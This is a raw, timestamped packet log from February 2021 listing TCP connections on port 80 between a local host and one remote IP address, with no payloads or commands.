Feb 15, 2021 21:26:47.627285957 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.627316952 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.627352953 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.636857986 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.640640974 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.664109945 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.664134026 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.664180040 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.664205074 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.664221048 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.664239883 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.664254904 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.664258003 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.664273977 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.664289951 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.664293051 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.664307117 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.664320946 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.664323092 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.664350033 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.664381981 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.664462090 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.666625977 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.669203997 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.669225931 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.669300079 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.669341087 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.669348955 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.669363022 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.669409037 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.669447899 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.669493914 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.669501066 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.669543982 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.672183037 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.672296047 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.705498934 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.705527067 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.705543995 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.705560923 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.705593109 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.705593109 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.705610037 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.705626011 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.705641985 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.705645084 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.705657005 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.705672979 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.705672979 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.705688953 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.705696106 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.705705881 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.705730915 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.705765963 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.709811926 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.711468935 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.711489916 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.711504936 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.711524010 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.711543083 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.711558104 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.711611986 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.712107897 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.712136030 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.712169886 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.746527910 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.746560097 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.746572018 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.746584892 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.746602058 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.746613979 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.746632099 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.746649027 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.746668100 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.746673107 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.746685028 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.746701002 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.746701956 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.746717930 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.746728897 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.746746063 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.746778011 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.751266956 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.751379013 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.752387047 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.752412081 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.752433062 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.752449036 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.752465963 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.752468109 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.752481937 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.752497911 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.752511978 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.752513885 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.752537966 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.752557039 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.752677917 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.752696037 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.752712011 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.752727032 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.752737045 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.752767086 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.757064104 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.760744095 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.792308092 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793452978 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793476105 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793489933 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793504000 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793517113 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793534994 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793553114 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793570042 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793590069 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793607950 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793626070 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793638945 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793654919 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793657064 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.793669939 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793685913 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793701887 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793720961 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.793720961 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.793751001 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.793772936 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.796907902 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.797028065 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.825586081 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.825618029 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.825630903 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.825643063 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.825685024 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.825730085 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.825758934 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.828814983 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.828839064 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.828852892 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.828865051 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.828881979 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.828900099 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.828917027 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.828931093 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.828947067 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.828952074 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.828973055 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.828993082 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.829010010 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.829018116 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.829025984 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.829057932 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.829085112 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.829133987 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.829161882 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.829178095 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.829186916 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.829191923 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.829227924 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.829265118 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.873162031 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.920809031 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.958450079 CET	49761	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:48.046336889 CET	80	49761	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:48.081315994 CET	80	49761	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:48.081522942 CET	49761	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:48.082046032 CET	49761	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:48.130369902 CET	80	49761	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:50.155874968 CET	49763	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:50.156188965 CET	49764	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:50.202172995 CET	80	49763	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:50.202289104 CET	80	49764	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:50.202312946 CET	49763	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:50.202359915 CET	49764	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:50.211947918 CET	49763	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:50.297969103 CET	80	49763	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:50.666774988 CET	80	49763	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:50.666857004 CET	80	49763	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:50.666954041 CET	49763	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:50.666982889 CET	49763	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:50.669523954 CET	49763	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:50.717396021 CET	80	49763	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:51.915172100 CET	49764	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:39.825490952 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:39.871581078 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:39.871697903 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:39.873075008 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:39.962089062 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:39.998234034 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:39.998258114 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:39.998275042 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:39.998291016 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:39.998306990 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:39.998317957 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:39.998322964 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:39.998339891 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:39.998356104 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:39.998374939 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:39.998383045 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:39.998394012 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:39.998439074 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:39.998461962 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.044647932 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044675112 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044692039 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044707060 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044725895 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044728994 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.044744015 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044759989 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044760942 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.044775963 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044787884 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.044791937 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044807911 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044822931 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044833899 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.044838905 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044859886 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044876099 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.044878006 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044893980 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044909954 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044925928 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044929028 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.044941902 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044958115 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044971943 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.044974089 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.044997931 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.045032024 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092091084 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092133999 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092152119 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092169046 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092185020 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092200994 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092216969 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092233896 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092248917 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092268944 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092287064 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092293024 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092303038 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092317104 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092319012 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092325926 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092334986 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092338085 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092355013 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092385054 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092401028 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092401028 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092417002 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092421055 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092430115 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092432976 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092449903 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092468023 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092479944 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092488050 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092502117 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092505932 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092521906 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092540026 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092551947 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092577934 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092597961 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092614889 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092629910 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092645884 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092662096 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092677116 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092681885 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092693090 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092693090 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092699051 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092703104 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092708111 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092709064 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092729092 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092732906 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092746973 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092762947 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092778921 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092794895 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.092801094 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.092870951 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.141804934 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.141843081 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.141868114 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.141891956 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.141916037 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.141921043 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.141932964 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.141947985 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.141964912 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.141968966 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.141984940 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142004013 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142026901 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142051935 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142060995 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142074108 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142079115 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142097950 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142115116 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142123938 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142136097 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142155886 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142165899 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142174006 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142191887 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142209053 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142214060 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142226934 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142242908 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142245054 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142262936 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142273903 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142283916 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142302990 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142317057 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142319918 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142332077 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142338037 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142355919 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142371893 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142385960 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142389059 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142405033 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142405987 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142426968 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142451048 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142461061 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142469883 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142493010 CET	80	49772	34.65.144.159	192.168.2.5
Feb 15, 2021 21:27:40.142494917 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.142539978 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.220504999 CET	49772	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:27:40.356487989 CET	49772	80	192.168.2.5	34.65.144.159
